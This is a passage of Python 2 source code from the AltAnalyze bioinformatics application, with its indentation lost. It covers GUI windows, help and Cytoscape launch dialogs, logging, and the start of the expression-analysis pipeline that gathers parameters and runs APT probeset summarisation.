help_button = Button(root, text=button_text, command=self.Helplinkout)
help_button.pack(side = 'left', padx = 5, pady = 5)
if self.emergency_exit == False:
self.tl.protocol("WM_DELETE_WINDOW", self.tldeleteWindow)
self.tl.mainloop() ###Needed to show graphic
else:
""" This shouldn't have to be called, but is when the topLevel window isn't closed first
specifically if a PNG file is opened. the sys.exitfunc() should work but doesn't.
work on this more later """
#AltAnalyzeSetup('no')
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try: self.tl.quit(); self.tl.destroy()
except Exception: None
try: root.quit(); root.destroy()
except Exception: None
UI.getUpdatedParameters(array_type,species,'Process Expression file',output_dir)
sys.exit() ### required when opening PNG files on Windows to continue (not sure why)
#sys.exitfunc()
def tldeleteWindow(self):
try: self.tl.quit(); self.tl.destroy()
except Exception: self.tl.destroy()
def deleteTLWindow(self):
self.emergency_exit = True
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
self.tl.quit()
self.tl.destroy()
sys.exitfunc()
def deleteWindow(self):
self.emergency_exit = True
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try:
self.tl.quit()
self.tl.destroy()
except Exception: None
sys.exitfunc()
def continue_win(self):
self.emergency_exit = True
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try: self.tl.quit(); self.tl.destroy()
except Exception: pass
root.quit()
root.destroy()
try: self.tl.grid_forget()
except Exception: None
try: root.grid_forget()
except Exception: None
sys.exitfunc()
def openDirectory(self):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.output_dir+'"')
except Exception: os.system('open "'+self.output_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+self.output_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+self.output_dir+'/"')
def openSuppliedDirectory(self,dir):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.output_dir+'"')
except Exception: os.system('open "'+dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+dir+'/"')
def DGlinkout(self):
try:
altanalyze_path = filepath('') ### Find AltAnalye's path
altanalyze_path = altanalyze_path[:-1]
except Exception: null=[]
if os.name == 'nt':
parent_dir = 'C:/Program Files'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.exe'
elif 'darwin' in sys.platform:
parent_dir = '/Applications'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.app'
elif 'linux' in sys.platform:
parent_dir = '/opt'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape'
try: openCytoscape(altanalyze_path,application_dir,application_name)
except Exception: null=[]
try: self._tls.destroy()
except Exception: None
try: ###Remove this cytoscape as the default
file_location_defaults = UI.importDefaultFileLocations()
del file_location_defaults['CytoscapeDir']
UI.exportDefaultFileLocations(file_location_defaults)
except Exception: null=[]
self.GetHelpTopLevel(self.dg_url,self.dg_pdf_file)
def Helplinkout(self): self.GetHelpTopLevel(self.help_url,self.pdf_help_file)
def whatNextlinkout(self): self.GetHelpTopLevel(self.whatNext_url,self.whatNext_pdf)
def ShowImageMPL(self,file_location):
""" Visualization method using MatPlotLib """
try:
import matplotlib
import matplotlib.pyplot as pylab
except Exception:
#print 'Graphical output mode disabled (requires matplotlib, numpy and scipy)'
None
fig = pylab.figure()
pylab.subplots_adjust(left=0.0, right=1.0, top=1.0, bottom=0.00) ### Fill the plot area left to right
ax = fig.add_subplot(111)
ax.set_xticks([]) ### Hides ticks
ax.set_yticks([])
img= pylab.imread(file_location)
imgplot = pylab.imshow(img)
pylab.show()
def viewPNGFile(self,png_file_dir):
""" View PNG file within a PMW Tkinter frame """
try: import ImageTk
except Exception:
from PIL import ImageTk
from PIL import Image
tlx = Toplevel(); self._tlx = tlx
sf = PmwFreeze.ScrolledFrame(tlx, labelpos = 'n', label_text = '',
usehullsize = 1, hull_width = 800, hull_height = 550)
sf.pack(padx = 0, pady = 0, fill = 'both', expand = 1)
frame = sf.interior()
tlx.title(png_file_dir)
img = ImageTk.PhotoImage(file=png_file_dir)
can = Canvas(frame)
can.pack(fill=BOTH, padx = 0, pady = 0)
w = img.width()
h = height=img.height()
can.config(width=w, height=h)
can.create_image(2, 2, image=img, anchor=NW)
tlx.mainloop()
def openPNGImage(self,png_file_dir):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+png_file_dir+'"')
except Exception: os.system('open "'+png_file_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+png_file_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+png_file_dir+'"')
def DisplayPlots(self,file_location):
""" Native Tkinter method - Displays a gif file in a standard TopLevel window (nothing fancy) """
tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('AltAnalyze Plot Visualization')
self.sf = PmwFreeze.ScrolledFrame(self._tls,
labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 520, hull_height = 500)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = file_location)
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
img = PhotoImage(file=filepath(file_location))
can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 20); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
tls.mainloop()
def GetHelpTopLevel(self,url,pdf_file):
try:
config_db = UI.importConfigFile()
ask_for_help = config_db['help'] ### hide_selection_option
except Exception: ask_for_help = 'null'; config_db={}
self.pdf_file = pdf_file; self.url = url
if ask_for_help == 'null':
message = ''; self.message = message; self.online_help = 'Online Documentation'; self.pdf_help = 'Local PDF File'
tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('Please select one of the options')
self.sf = PmwFreeze.ScrolledFrame(self._tls,
labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 320, hull_height = 200)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
filename = 'Config/icon.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 20); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
text_button2 = Button(group.interior(), text=self.online_help, command=self.openOnlineHelp); text_button2.pack(side = 'top', padx = 5, pady = 5)
try: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
except Exception: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
text_button3 = Button(group.interior(), text='No Thanks', command=self.skipHelp); text_button3.pack(side = 'top', padx = 5, pady = 5)
c = Checkbutton(group.interior(), text = "Apply these settings each time", command=self.setHelpConfig); c.pack(side = 'bottom', padx = 5, pady = 0)
tls.mainloop()
try: tls.destroy()
except Exception: None
else:
file_location_defaults = UI.importDefaultFileLocations()
try:
help_choice = file_location_defaults['HelpChoice'].Location()
if help_choice == 'PDF': self.openPDFHelp()
elif help_choice == 'http': self.openOnlineHelp()
else: self.skip()
except Exception: self.openPDFHelp() ### Open PDF if there's a problem
def SelectCytoscapeTopLevel(self):
try:
config_db = UI.importConfigFile()
cytoscape_type = config_db['cytoscape'] ### hide_selection_option
except Exception: cytoscape_type = 'null'; config_db={}
if cytoscape_type == 'null':
message = ''; self.message = message
tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('Cytoscape Automatic Start Options')
self.sf = PmwFreeze.ScrolledFrame(self._tls,
labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 420, hull_height = 200)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
filename = 'Config/cyto-logo-smaller.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 5); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
#"""
self.local_cytoscape = 'AltAnalyze Bundled Version'; self.custom_cytoscape = 'Previously Installed Version'
l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
l3 = Label(group.interior(), text='Select version of Cytoscape to open:'); l3.pack(side = 'top', pady = 5)
"""
self.local_cytoscape = ' No '; self.custom_cytoscape = ' Yes '
l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
l2 = Label(group.interior(), text='Note: Cytoscape can take up-to a minute to initalize', fg="red"); l2.pack(side = 'top', padx = 5, pady = 0)
"""
text_button2 = Button(group.interior(), text=self.local_cytoscape, command=self.DGlinkout); text_button2.pack(padx = 5, pady = 5)
try: text_button = Button(group.interior(), text=self.custom_cytoscape, command=self.getPath); text_button.pack(padx = 5, pady = 5)
except Exception: text_button = Button(group.interior(), text=self.custom_cytoscape, command=self.getPath); text_button.pack(padx = 5, pady = 5)
l2 = Label(group.interior(), text='Note: Cytoscape can take up-to a minute to initalize', fg="blue"); l2.pack(side = 'bottom', padx = 5, pady = 0)
c = Checkbutton(group.interior(), text = "Apply these settings each time and don't show again", command=self.setCytoscapeConfig); c.pack(side = 'bottom', padx = 5, pady = 0)
#c2 = Checkbutton(group.interior(), text = "Open PDF of DomainGraph help rather than online help", command=self.setCytoscapeConfig); c2.pack(side = 'bottom', padx = 5, pady = 0)
tls.mainloop()
try: tls.destroy()
except Exception: None
else:
file_location_defaults = UI.importDefaultFileLocations()
try: cytoscape_app_dir = file_location_defaults['CytoscapeDir'].Location(); openFile(cytoscape_app_dir)
except Exception:
try: altanalyze_path = filepath(''); altanalyze_path = altanalyze_path[:-1]
except Exception: altanalyze_path=''
application_dir = 'Cytoscape_v'
if os.name == 'nt': application_name = 'Cytoscape.exe'
elif 'darwin' in sys.platform: application_name = 'Cytoscape.app'
elif 'linux' in sys.platform: application_name = 'Cytoscape'
try: openCytoscape(altanalyze_path,application_dir,application_name)
except Exception: null=[]
def setCytoscapeConfig(self):
config_db={}; config_db['cytoscape'] = 'hide_selection_option'
UI.exportConfigFile(config_db)
def setHelpConfig(self):
config_db={}; config_db['help'] = 'hide_selection_option'
UI.exportConfigFile(config_db)
def getPath(self):
file_location_defaults = UI.importDefaultFileLocations()
if os.name == 'nt': parent_dir = 'C:/Program Files'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.exe'
elif 'darwin' in sys.platform: parent_dir = '/Applications'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.app'
elif 'linux' in sys.platform: parent_dir = '/opt'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape'
try:
self.default_dir = file_location_defaults['CytoscapeDir'].Location()
self.default_dir = string.replace(self.default_dir,'//','/')
self.default_dir = string.replace(self.default_dir,'\\','/')
self.default_dir = string.join(string.split(self.default_dir,'/')[:-1],'/')
except Exception:
dir = FindDir(parent_dir,application_dir); dir = filepath(parent_dir+'/'+dir)
self.default_dir = filepath(parent_dir)
try: dirPath = tkFileDialog.askdirectory(parent=self._tls,initialdir=self.default_dir)
except Exception:
self.default_dir = ''
try: dirPath = tkFileDialog.askdirectory(parent=self._tls,initialdir=self.default_dir)
except Exception:
try: dirPath = tkFileDialog.askdirectory(parent=self._tls)
except Exception: dirPath=''
try:
#print [dirPath],application_name
app_dir = dirPath+'/'+application_name
if 'linux' in sys.platform:
try: createCytoscapeDesktop(cytoscape_dir)
except Exception: null=[]
dir_list = unique.read_directory('/usr/bin/') ### Check to see that JAVA is installed
if 'java' not in dir_list: print 'Java not referenced in "usr/bin/. If not installed,\nplease install and re-try opening Cytoscape'
try:
jar_path = dirPath+'/cytoscape.jar'
main_path = dirPath+'/cytoscape.CyMain'
plugins_path = dirPath+'/plugins'
os.system('java -Dswing.aatext=true -Xss5M -Xmx512M -jar '+jar_path+' '+main_path+' -p '+plugins_path+' &')
print 'Cytoscape jar opened:',jar_path
except Exception:
print 'OS command to open Java failed.'
try: openFile(app_dir2); print 'Cytoscape opened:',app_dir2
except Exception: openFile(app_dir)
else: openFile(app_dir)
try: file_location_defaults['CytoscapeDir'].SetLocation(app_dir)
except Exception:
fl = UI.FileLocationData('', app_dir, 'all')
file_location_defaults['CytoscapeDir'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
except Exception: null=[]
try: self._tls.destroy()
except Exception: None
self.GetHelpTopLevel(self.dg_url,self.dg_pdf_file)
def openOnlineHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try:file_location_defaults['HelpChoice'].SetLocation('http')
except Exception:
fl = UI.FileLocationData('', 'http', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
webbrowser.open(self.url)
#except Exception: null=[]
try: self._tls.destroy()
except Exception: None
def skipHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try: file_location_defaults['HelpChoice'].SetLocation('skip')
except Exception:
fl = UI.FileLocationData('', 'skip', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
try: self._tls.destroy()
except Exception: None
def openPDFHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try:file_location_defaults['HelpChoice'].SetLocation('PDF')
except Exception:
fl = UI.FileLocationData('', 'PDF', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.pdf_file+'"')
except Exception: os.system('open "'+self.pdf_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+self.pdf_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+self.pdf_file+'"')
try: self._tls.destroy()
except Exception: None
def quit(self):
root.quit()
root.destroy()
sys.exit()
def close(self):
#self.tl.quit() #### This was causing multiple errors in 2.0.7 - evaluate more!
self.tl.destroy()
class StringVarFile:
def __init__(self,stringVar,window):
self.__newline = 0; self.__stringvar = stringVar; self.__window = window
def write(self,s):
try:
log_report = open(log_file,'a')
log_report.write(s); log_report.close() ### Variable to record each print statement
new = self.__stringvar.get()
for c in s:
#if c == '\n': self.__newline = 1
if c == '\k': self.__newline = 1### This should not be found and thus results in a continous feed rather than replacing a single line
else:
if self.__newline: new = ""; self.__newline = 0
new = new+c
self.set(new)
except Exception: pass
def set(self,s):
try: self.__stringvar.set(s); self.__window.update()
except Exception: pass
def get(self):
try:
return self.__stringvar.get()
except Exception: pass
def flush(self):
pass
def timestamp():
import datetime
today = str(datetime.date.today()); today = string.split(today,'-'); today = today[0]+''+today[1]+''+today[2]
time_stamp = string.replace(time.ctime(),':','')
time_stamp = string.replace(time_stamp,' ',' ')
time_stamp = string.split(time_stamp,' ') ###Use a time-stamp as the output dir (minus the day)
time_stamp = today+'-'+time_stamp[3]
return time_stamp
def callWXPython():
import wx
import AltAnalyzeViewer
app = wx.App(False)
AltAnalyzeViewer.remoteViewer(app)
def AltAnalyzeSetup(skip_intro):
global apt_location; global root_dir;global log_file; global summary_data_db; summary_data_db={}; reload(UI)
global probability_statistic; global commandLineMode; commandLineMode = 'no'
if 'remoteViewer' == skip_intro:
if os.name == 'nt':
callWXPython()
elif os.name == 'ntX':
package_path = filepath('python')
win_package_path = string.replace(package_path,'python','AltAnalyzeViewer.exe')
import subprocess
subprocess.call([win_package_path]);sys.exit()
elif os.name == 'posix':
package_path = filepath('python')
#mac_package_path = string.replace(package_path,'python','AltAnalyze.app/Contents/MacOS/python')
#os.system(mac_package_path+' RemoteViewer.py');sys.exit()
mac_package_path = string.replace(package_path,'python','AltAnalyzeViewer.app/Contents/MacOS/AltAnalyzeViewer')
import subprocess
subprocess.call([mac_package_path]);sys.exit()
"""
import threading
import wx
app = wx.PySimpleApp()
t = threading.Thread(target=callWXPython)
t.setDaemon(1)
t.start()
s = 1
queue = mlp.Queue()
proc = mlp.Process(target=callWXPython) ### passing sys.stdout unfortunately doesn't work to pass the Tk string
proc.start()
sys.exit()
"""
reload(UI)
expr_var, alt_var, additional_var, goelite_var, exp_file_location_db = UI.getUserParameters(skip_intro,Multi=mlp)
"""except Exception:
if 'SystemExit' not in str(traceback.format_exc()):
expr_var, alt_var, additional_var, goelite_var, exp_file_location_db = UI.getUserParameters('yes')
else: sys.exit()"""
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]
apt_location = fl.APTLocation()
root_dir = fl.RootDir()
try: probability_statistic = fl.ProbabilityStatistic()
except Exception: probability_statistic = 'unpaired t-test'
time_stamp = timestamp()
log_file = filepath(root_dir+'AltAnalyze_report-'+time_stamp+'.log')
log_report = open(log_file,'w'); log_report.close()
if use_Tkinter == 'yes' and debug_mode == 'no':
try:
global root; root = Tk()
StatusWindow(root,expr_var, alt_var, goelite_var, additional_var, exp_file_location_db)
root.destroy()
except Exception, exception:
try:
print traceback.format_exc()
badExit()
except Exception: sys.exit()
else: AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db,'')
def badExit():
print "\n...exiting AltAnalyze due to unexpected error"
try:
time_stamp = timestamp()
print_out = "Unknown error encountered during data processing.\nPlease see logfile in:\n\n"+log_file+"\nand report to altanalyze@gmail.com."
try:
if len(log_file)>0:
if commandLineMode == 'no':
if os.name == 'nt':
try: os.startfile('"'+log_file+'"')
except Exception: os.system('open "'+log_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+log_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+log_file+'"')
if commandLineMode == 'no':
try: UI.WarningWindow(print_out,'Error Encountered!'); root.destroy()
except Exception: print print_out
except Exception: sys.exit()
except Exception: sys.exit()
sys.exit()
kill
def AltAnalyzeMain(expr_var,alt_var,goelite_var,additional_var,exp_file_location_db,root):
### Hard-coded defaults
w = 'Agilent'; x = 'Affymetrix'; y = 'Ensembl'; z = 'any'; data_source = y; constitutive_source = z; manufacturer = x ### Constitutive source, is only really paid attention to if Ensembl, otherwise Affymetrix is used (even if default)
### Get default options for ExpressionBuilder and AltAnalyze
start_time = time.time()
test_goelite = 'no'; test_results_pannel = 'no'
global species; global array_type; global expression_data_format; global use_R; use_R = 'no'
global analysis_method; global p_threshold; global filter_probeset_types
global permute_p_threshold; global perform_permutation_analysis; global export_NI_values
global run_MiDAS; global analyze_functional_attributes; global microRNA_prediction_method
global calculate_normIntensity_p; global pathway_permutations; global avg_all_for_ss; global analyze_all_conditions
global remove_intronic_junctions
global agglomerate_inclusion_probesets; global expression_threshold; global factor_out_expression_changes
global only_include_constitutive_containing_genes; global remove_transcriptional_regulated_genes; global add_exons_to_annotations
global exclude_protein_details; global filter_for_AS; global use_direct_domain_alignments_only; global run_from_scratch
global explicit_data_type; explicit_data_type = 'null'
global altanalyze_files; altanalyze_files = []
species,array_type,manufacturer,constitutive_source,dabg_p,raw_expression_threshold,avg_all_for_ss,expression_data_format,include_raw_data, run_from_scratch, perform_alt_analysis = expr_var
analysis_method,p_threshold,filter_probeset_types,alt_exon_fold_variable,gene_expression_cutoff,remove_intronic_junctions,permute_p_threshold,perform_permutation_analysis, export_NI_values, analyze_all_conditions = alt_var
calculate_normIntensity_p, run_MiDAS, use_direct_domain_alignments_only, microRNA_prediction_method, filter_for_AS, additional_algorithms = additional_var
ge_fold_cutoffs,ge_pvalue_cutoffs,ge_ptype,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,pathway_permutations,mod,returnPathways = goelite_var
original_remove_intronic_junctions = remove_intronic_junctions
if run_from_scratch == 'Annotate External Results': analysis_method = 'external'
if returnPathways == 'no' or returnPathways == 'None':
returnPathways = None
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]
try: exon_exp_threshold = fl.ExonExpThreshold()
except Exception: exon_exp_threshold = 'NA'
try: gene_exp_threshold = fl.GeneExpThreshold()
except Exception: gene_exp_threshold = 'NA'
try: exon_rpkm_threshold = fl.ExonRPKMThreshold()
except Exception: exon_rpkm_threshold = 'NA'
try: rpkm_threshold = fl.RPKMThreshold() ### Gene-Level
except Exception: rpkm_threshold = 'NA'
fl.setJunctionExpThreshold(raw_expression_threshold) ### For RNA-Seq, this specifically applies to exon-junctions
try: predictGroups = fl.predictGroups()
except Exception: predictGroups = False
try:
if fl.excludeLowExpressionExons(): excludeLowExpExons = 'yes'
else: excludeLowExpExons = 'no'
except Exception: excludeLowExpExons = 'no'
if test_goelite == 'yes': ### It can be difficult to get error warnings from GO-Elite, unless run here
results_dir = filepath(fl.RootDir())
elite_input_dirs = ['AltExonConfirmed','AltExon','regulated','upregulated','downregulated'] ### Run GO-Elite multiple times to ensure heatmaps are useful and to better organize results
for elite_dir in elite_input_dirs:
file_dirs = results_dir+'GO-Elite/'+elite_dir,results_dir+'GO-Elite/denominator',results_dir+'GO-Elite/'+elite_dir
variables = species,mod,pathway_permutations,filter_method,z_threshold,p_val_threshold,change_threshold,resources_to_analyze,returnPathways,file_dirs,root
GO_Elite.remoteAnalysis(variables,'non-UI',Multi=mlp)
global perform_element_permutation_analysis; global permutations
perform_element_permutation_analysis = 'yes'; permutations = 2000
analyze_functional_attributes = 'yes' ### Do this by default (shouldn't substantially increase runtime)
if run_from_scratch != 'Annotate External Results' and (array_type != "3'array" and array_type!='RNASeq'):
if run_from_scratch !='Process AltAnalyze filtered':
try: raw_expression_threshold = float(raw_expression_threshold)
except Exception: raw_expression_threshold = 1
if raw_expression_threshold<1:
raw_expression_threshold = 1
print "Expression threshold < 1, forcing to be a minimum of 1."
try: dabg_p = float(dabg_p)
except Exception: dabg_p = 0
if dabg_p == 0 or dabg_p > 1:
print "Invalid dabg-p value threshold entered,(",dabg_p,") setting to default of 0.05"
dabg_p = 0.05
if use_direct_domain_alignments_only == 'direct-alignment': use_direct_domain_alignments_only = 'yes'
if run_from_scratch == 'Process CEL files': expression_data_format = 'log'
print "Beginning AltAnalyze Analysis... Format:", expression_data_format
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print_items=[]; #print [permute_p_threshold]; sys.exit()
if 'array' in array_type:
dataType='Gene Expression'
else:
dataType=array_type
print_items.append("AltAnalyze version 2.1.3 - Expression Analysis Parameters Being Used...")
print_items.append('\t'+'database'+': '+unique.getCurrentGeneDatabaseVersion())
print_items.append('\t'+'species'+': '+species)
print_items.append('\t'+'method'+': '+dataType)
print_items.append('\t'+'manufacturer'+': '+manufacturer)
print_items.append('\t'+'probability_statistic'+': '+probability_statistic)
print_items.append('\t'+'constitutive_source'+': '+constitutive_source)
print_items.append('\t'+'dabg_p'+': '+str(dabg_p))
if array_type == 'RNASeq':
print_items.append('\t'+'junction expression threshold'+': '+str(raw_expression_threshold))
print_items.append('\t'+'exon_exp_threshold'+': '+str(exon_exp_threshold))
print_items.append('\t'+'gene_exp_threshold'+': '+str(gene_exp_threshold))
print_items.append('\t'+'exon_rpkm_threshold'+': '+str(exon_rpkm_threshold))
print_items.append('\t'+'gene_rpkm_threshold'+': '+str(rpkm_threshold))
print_items.append('\t'+'exclude low expressing exons for RPKM'+': '+excludeLowExpExons)
else:
print_items.append('\t'+'raw_expression_threshold'+': '+str(raw_expression_threshold))
print_items.append('\t'+'avg_all_for_ss'+': '+avg_all_for_ss)
print_items.append('\t'+'expression_data_format'+': '+expression_data_format)
print_items.append('\t'+'include_raw_data'+': '+include_raw_data)
print_items.append('\t'+'run_from_scratch'+': '+run_from_scratch)
print_items.append('\t'+'perform_alt_analysis'+': '+perform_alt_analysis)
if avg_all_for_ss == 'yes': cs_type = 'core'
else: cs_type = 'constitutive'
print_items.append('\t'+'calculate_gene_expression_using'+': '+cs_type)
print_items.append("Alternative Exon Analysis Parameters Being Used..." )
print_items.append('\t'+'analysis_method'+': '+analysis_method)
print_items.append('\t'+'p_threshold'+': '+str(p_threshold))
print_items.append('\t'+'filter_data_types'+': '+filter_probeset_types)
print_items.append('\t'+'alt_exon_fold_variable'+': '+str(alt_exon_fold_variable))
print_items.append('\t'+'gene_expression_cutoff'+': '+str(gene_expression_cutoff))
print_items.append('\t'+'remove_intronic_junctions'+': '+remove_intronic_junctions)
print_items.append('\t'+'avg_all_for_ss'+': '+avg_all_for_ss)
print_items.append('\t'+'permute_p_threshold'+': '+str(permute_p_threshold))
print_items.append('\t'+'perform_permutation_analysis'+': '+perform_permutation_analysis)
print_items.append('\t'+'export_NI_values'+': '+export_NI_values)
print_items.append('\t'+'run_MiDAS'+': '+run_MiDAS)
print_items.append('\t'+'use_direct_domain_alignments_only'+': '+use_direct_domain_alignments_only)
print_items.append('\t'+'microRNA_prediction_method'+': '+microRNA_prediction_method)
print_items.append('\t'+'analyze_all_conditions'+': '+analyze_all_conditions)
print_items.append('\t'+'filter_for_AS'+': '+filter_for_AS)
if pathway_permutations == 'NA': run_GOElite = 'decide_later'
else: run_GOElite = 'run-immediately'
print_items.append('\t'+'run_GOElite'+': '+ run_GOElite)
universalPrintFunction(print_items)
if commandLineMode == 'yes': print 'Running command line mode:',commandLineMode
summary_data_db['gene_assayed'] = 0
summary_data_db['denominator_exp_genes']=0
summary_data_db['alt_events'] = 0
summary_data_db['denominator_exp_events'] = 0
summary_data_db['alt_genes'] = 0
summary_data_db['direct_domain_genes'] = 0
summary_data_db['miRNA_gene_denom'] = 0
summary_data_db['miRNA_gene_hits'] = 0
if test_results_pannel == 'yes': ### It can be difficult to get error warnings from GO-Elite, unless run here
graphic_links = []
graphic_links.append(['test','Config/AltAnalyze_structure-RNASeq.jpg'])
summary_data_db['QC']=graphic_links
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
dataset = 'test'; results_dir=''
print "Analysis Complete\n";
if root !='' and root !=None:
UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_data_db)
root.destroy(); sys.exit()
global export_go_annotations; global aspire_output_list; global aspire_output_gene_list
global filter_probesets_by; global global_addition_factor; global onlyAnalyzeJunctions
global log_fold_cutoff; global aspire_cutoff; global annotation_system; global alt_exon_logfold_cutoff
"""dabg_p = 0.75; data_type = 'expression' ###used for expression analysis when dealing with AltMouse arrays
a = "3'array"; b = "exon"; c = "AltMouse"; e = "custom"; array_type = c
l = 'log'; n = 'non-log'; expression_data_format = l
hs = 'Hs'; mm = 'Mm'; dr = 'Dr'; rn = 'Rn'; species = mm
include_raw_data = 'yes'; expression_threshold = 70 ### Based on suggestion from BMC Genomics. 2006 Dec 27;7:325. PMID: 17192196, for hu-exon 1.0 st array
avg_all_for_ss = 'no' ###Default is 'no' since we don't want all probes averaged for the exon arrays"""
###### Run ExpressionBuilder ######
"""ExpressionBuilder is used to:
(1) extract out gene expression values, provide gene annotations, and calculate summary gene statistics
(2) filter probesets based DABG p-values and export to pair-wise comparison files
(3) build array annotations files matched to gene structure features (e.g. exons, introns) using chromosomal coordinates
options 1-2 are executed in remoteExpressionBuilder and option 3 is by running ExonArrayEnsembl rules"""
try:
additional_algorithm = additional_algorithms.Algorithm()
additional_score = additional_algorithms.Score()
except Exception: additional_algorithm = 'null'; additional_score = 'null'
if analysis_method == 'FIRMA': analyze_metaprobesets = 'yes'
elif additional_algorithm == 'FIRMA': analyze_metaprobesets = 'yes'
else: analyze_metaprobesets = 'no'
### Check to see if this is a real or FAKE (used for demonstration purposes) dataset
if run_from_scratch == 'Process CEL files' or 'Feature Extraction' in run_from_scratch:
for dataset in exp_file_location_db:
if run_from_scratch == 'Process CEL files':
fl = exp_file_location_db[dataset]
pgf_file=fl.InputCDFFile()
results_dir = filepath(fl.RootDir())
if '_demo' in pgf_file: ### Thus we are running demo CEL files and want to quit immediately
print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
try:
print "Analysis Complete\n";
if root !='' and root !=None:
UI.InfoWindow(print_out,'Analysis Completed!')
tl = Toplevel(); SummaryResultsWindow(tl,'AS',results_dir,dataset,'parent',summary_data_db)
except Exception: null=[]
skip_intro = 'yes'
if pathway_permutations == 'NA' and run_from_scratch != 'Annotate External Results':
reload(UI)
UI.getUpdatedParameters(array_type,species,run_from_scratch,results_dir)
try: AltAnalyzeSetup('no')
except Exception: sys.exit()
if 'CEL files' in run_from_scratch:
from import_scripts import APT
try:
try:
APT.probesetSummarize(exp_file_location_db,analyze_metaprobesets,filter_probeset_types,species,root)
if analyze_metaprobesets == 'yes':
analyze_metaprobesets = 'no' ### Re-run the APT analysis to obtain probeset rather than gene-level results (only the residuals are needed from a metaprobeset run)
APT.probesetSummarize(exp_file_location_db,analyze_metaprobesets,filter_probeset_types,species,root)
except Exception:
import platform
print "Trying to change APT binary access privileges"
for dataset in exp_file_location_db: ### Instance of the Class ExpressionFileLocationData
fl = exp_file_location_db[dataset]; apt_dir =fl.APTLocation()
if '/bin' in apt_dir: apt_file = apt_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
elif os.name == 'nt': apt_file = apt_dir + '/PC/'+platform.architecture()[0]+'/apt-probeset-summarize.exe'
elif 'darwin' in sys.platform: apt_file = apt_dir + '/Mac/apt-probeset-summarize'
elif 'linux' in sys.platform:
if '32bit' in platform.architecture(): apt_file = apt_dir + '/Linux/32bit/apt-probeset-summarize'
elif '64bit' in platform.architecture(): apt_file = apt_dir + '/Linux/64bit/apt-probeset-summarize'
